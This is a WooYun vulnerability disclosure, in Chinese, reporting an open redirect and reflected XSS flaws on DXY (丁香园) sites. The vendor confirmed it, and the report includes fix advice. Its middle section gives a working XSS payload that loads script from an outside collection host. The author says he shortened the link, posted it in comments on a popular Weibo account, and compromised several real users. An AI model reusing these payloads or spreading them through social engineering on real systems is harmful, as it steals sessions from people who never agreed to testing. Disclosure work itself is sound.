漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-019684
漏洞标题:丁香园漏洞小礼包(含过程,反射性xss利用技巧)
相关厂商:丁香园
漏洞作者: 梧桐雨
提交时间:2013-03-07 15:46
修复时间:2013-04-21 15:46
公开时间:2013-04-21 15:46
漏洞类型:xss跨站脚本攻击
危害等级:低
自评Rank:7
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-03-07: 细节已通知厂商并且等待厂商处理中
2013-03-07: 厂商已经确认,细节仅向厂商公开
2013-03-17: 细节向核心白帽子及相关领域专家公开
2013-03-27: 细节向普通白帽子公开
2013-04-06: 细节向实习白帽子公开
2013-04-21: 细节向公众公开
简要描述:
丁香园几个小礼包,xss+url跳转
详细说明:
http://paper.pubmed.cn/do.php?ac=login&rfu=http://paper.pubmed.cn/ rfu对地址未验证
http://paper.pubmed.cn/do.php?ac=login&rfu=(可构造任意链接进行跳转)
主要还是说说xss吧,没说明,一个礼包- -剑心还是不给过。这次我还是和上次一样。来一个利用吧。
我选中了http://www.jobmd.cn/article站点的搜索处的XSS进行测试。
之前提交过,但是没过程未过,这次我想了下,本想选择在论坛处通过发帖的形式传播一下。但是新注册,不能通过邀请,但是又不想手机注册,那怎么办呢?
我忽然想到了一个好的idea,就是通过@fenng的微博作为一个跳板(大辉哥微博是很多人看的哟,因此这里头肯定会有人是登录了丁香园帐号的。)
构造好代码:http://www.jobmd.cn/article/search.htm?keywords=%3C%2Ftitle%3E%3Cscript+src%3D%22http%3A%2F%2Fxss.ezsec.org%2F%3Fu%3Df71717%22+%3E%3C%2Fscript%3E&category=-1&action=Search&action_search=
这个时候还是太长了,我们通过url.cn转下,让他变得更加简洁:
http://url.cn/E273r7
然后通过小微博号发布到fenng的微博评论上。(带一点儿社工的性质)
没有多久,就有几个用户中招了。
漏洞证明:
获取到的信息:
危害证明,反射XSS用得好,一样可以造成很大的危害~
还有一处也有xss,顺便也发了,这个也是你们旗下的,还在内测中,好好修复下吧
http://pubmed.cn/index.php?st="><script>alert(1)</script> 首页反射型XSS
st参数没有过滤好。
修复方案:
修复建议:
url跳转:referer的限制下,加入有效性验证Token。
xss:过滤关键的地方,标题也别漏了。安全是一个整体,不是一个部分。
版权声明:转载请注明来源 梧桐雨@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2013-03-07 15:50
厂商回复:
感谢梧桐雨的工作。火速修正中...
最新状态:
暂无